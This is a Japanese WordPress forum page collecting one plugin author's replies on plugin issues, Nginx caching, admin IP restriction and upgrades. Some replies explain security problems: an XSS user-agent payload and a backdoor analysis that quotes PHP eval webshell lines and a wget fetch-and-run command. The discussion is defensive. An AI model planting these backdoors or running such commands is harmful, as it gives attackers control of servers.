wokamoto
フォーラムへの返信
-
フォーラム: プラグイン
返信が含まれるトピック: 【XSS 脆弱性】Crazy Bone(狂骨)が公式ディレクトリから削除されている0.6.0 以前に存在していた XSS 脆弱性ですが、以下のような UserAgent でアクセスされた場合、それを管理画面で表示すると JavaScript が実行されてしまうというものです。
User-agent: <script>alert(1);</script>これを修正したものが ver.0.6.0 になります。
0.6.0 以前を利用している場合は、管理画面でログイン履歴一覧を表示しなければ害はありませんが、はやめのアップデートをお願い致します。フォーラム: プラグイン
返信が含まれるトピック: StaticpressまたはReallyStaticで再構築を自動的に定期的に行いたいStaticPress 作者です。
現在 StaticPress には定期的に再構築する機能はありませんし、今後もその機能を実装する予定もありません。
ただ発想としては面白いので、気が向いたら実装するかもしれません。StaticPress では github でもソースを公開しています。
https://github.com/megumiteam/staticpressもし、そのような機能を実装されるのであれば、ぜひプルリクエストしてください。
フォーラム: プラグイン
返信が含まれるトピック: Nginx HelperについてNginx Helper ではなく Nginx Cache Controller ( http://wordpress.org/plugins/nginx-champuru/ ) というプラグインを使用して、それのアクションフック nginxchampuru_flush_cache を使えば実現できると思います。
詳しくは下記 URL を参考にしてください。
http://dogmap.jp/2012/09/01/nginx-cache-controller-1-1-4/上の記事では purge.php をリバプロに置いてやる方法が書かれていますが、リバプロ側に ngx_cache_purage モジュールを組み込んでいるのであれば purge.php は必要ありません。
アクションフックを登録するで書かれている nginx_flush_cache() ファンクション内で wp_remote_get() している URL を ngx_cache_purage モジュールでキャッシュをパージするための URL に変更してみてください。フォーラム: 使い方全般
返信が含まれるトピック: WordPress の管理画面を IP アドレスで制限する上のディレクトリに置いたのであれば ip_check::is_allowed_ip() を呼び出す部分を変更します。
以下のような感じです。if ( preg_match('#(/wp-admin/.*|wp-login\.php)#i', $_SERVER['REQUEST_URI']) && !preg_match('#admin-ajax\.php#i', $_SERVER['REQUEST_URI']) ) { require( dirname(__FILE__) . '/ip_check.php' ); if ( !ip_check::is_allowed_ip( dirname(dirname(__FILE__)) . '/.allowed_ip' ) ) { header("HTTP/1.1 403 Forbidden"); echo "403 Forbidden\n"; die(); } }フォーラム: マルチサイト
返信が含まれるトピック: マルチサイトでのベーシック認証の利用フォーラム: マルチサイト
返信が含まれるトピック: マルチサイトでのベーシック認証の利用マルチサイトで検証していないので恐縮ですが…
拙作のプラグイン WP Basic Auth で対応できるかもです。
http://wordpress.org/plugins/wp-basic-auth/このプラグインは有効にするだけで WordPress のユーザ名/パスワードでサイト全体に BASIC 認証がかかります。
ただし、画像ファイル等の静的ファイルについては BASIC 認証がかからないので注意してください。フォーラム: プラグイン
返信が含まれるトピック: 昨日から突然ツイートされなくなった昨日 Twitter API v.1.0 が完全に廃止され、Twitter API v.1.1 のみしか受け付けなくなっています。
https://twitter.com/TwitterDevJP/status/344628654690664448Twitter API v.1.0 を使用して tweet しているプラグインは正常に動作しなくなっていると思います。
拙作の Simple Tweet は、Twitter API V.1.1 に対応しているので動作しています。
http://wordpress.org/plugins/simple-tweet/フォーラム: 使い方全般
返信が含まれるトピック: ログイン画面へ wp-admin 以外でアクセスできてしまうどうも、memo.dogmap.jp を書いてるものです。
コメント欄でも指摘されていますが core.trac で追加されてることが言及されてますね。
http://core.trac.wordpress.org/ticket/19607/admin/ のほか、/login/, /dashboard/ でも大丈夫です。
フォーラム: 使い方全般
返信が含まれるトピック: 特定のURL、固定ページのみ「theme」を切り替えるそれでは、ダメです。
プラグインにするなら、いかのような感じになると思います。
https://gist.github.com/4679580あと、この課題はすでに「解決済み」でしたね。
本来であれば、別課題を建てていただいた方が良いと思います。フォーラム: 使い方全般
返信が含まれるトピック: 特定のURL、固定ページのみ「theme」を切り替えるswitch 文を使えば簡単ですね。
// REQUEST_URL から一番上の階層を取り出す $cat = preg_replace('#^/([^/]+)/?.*$#', '$1', $_SERVER['REQUEST_URI']); // abaout, news, blog によって、テーマを変更する $overrideTheme = false; switch ($cat) { case 'about': $overrideTheme = 'twentyten'; break; case 'news': $overrideTheme = 'twentyeleven'; break; case 'blog': $overrideTheme = 'twentytwelve'; break; } // テーマのオーバーライド if ( $overrideTheme ) { $overrideTheme = wp_get_theme($overrideTheme); if ( $overrideTheme->exists() ) { return $overrideTheme['Template']; } else { return $theme; } } else { return $theme; }フォーラム: インストール
返信が含まれるトピック: さくらVPSでのWordPressインストール時手前味噌ですがセキュリティ設定に着いては、こちらもご一読ください
フォーラム: その他
返信が含まれるトピック: [セキュリティ バックドア改竄]このコードの役割は?<?eval(stripslashes(array_pop($_POST)))?>これは $_POST 配列の最後の値を取り出して、その文字列を PHP コードとして実行するための記述です。
$_POST 配列には、サーバに POST メソッドで送られた値が入りますので、例えば POST で以下のような文字列が送られてきた場合、サーバで UNIX コマンドが実行されてしまいます。shell_exec('wget http://example.com/evil.script.sh; ./evil.script.sh');攻撃者は、任意の PHP コードを、HTTP の POST メソッドで送りつけて、あなたのサーバで実行させることができるため、大変危険です。
if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* v0xXJf2 */こちらも、同様に $_REQUEST[‘asc’] という値があれば、それを PHP コードとして実行します。
$_REQUEST には、POST, GET, COOKIE 等で送られてきたデータが入ります。
攻撃者は POST や GET メソッドで asc という名前で PHP コードを送りつけて、あなたのサーバで実行させることができます。フォーラム: プラグイン
返信が含まれるトピック: Curlのインストールのやり方についてWordPress の質問では無いので、本来は Ubuntu フォーラム等で聞いてもらった方が良いと思いますが…
php5-curl パッケージをインストールする必要があります。
$ sudo apt-get install php5-curlその後 Apache なり、php-fpm なりを再起動してください。
フォーラム: インストール
返信が含まれるトピック: Contact Form 7を有効化するとエラー表示になります。フォーラム: インストール
返信が含まれるトピック: Contact Form 7を有効化するとエラー表示になります。Contact Form 7 の公式プラグインページ ( http://wordpress.org/extend/plugins/contact-form-7/ ) には「Requires: 3.2 or higher」とありますね。
WordPress を 3.2 以上にバージョンアップしなければならないと思います。提示されたエラーメッセージ「Call to undefined function menu_page_url()」と言うのは、Contact Form 7 の中で使用されている関数 menu_page_url() が定義されていないという意味です。
この menu_page_url() という関数は、WordPress コアソースで定義されている関数ですが、これが実装されたのは WordPress 3.0 以降だったはずです。
少なくとも、WordPress 3.0 以上でなければ Contact Form 7 ver. 3.1.2 は、動作しないはずです。
もし、WordPress 3.0.x, 3.1.x で動作したとしても、公式プラグインページに記述してあるように WordPress 3.2 以降で無い場合は、十分にテストしてあるとも言えないため、何か問題が発生する可能性もあります。
公式プラグインページで提示されているように WordPress を 3.2 以降にバージョンアップすることをオススメします。WordPress 2.9.2 でも動作するバージョンの Contact Form 7 を使用するという選択肢も有りますが、これは、オススメできません。
修正された Fix の中には、脆弱性に関連するものも含まれているかもしれないからです。
特に問題がない限りは、最新版の WordPress とプラグインを使用するようにしましょう。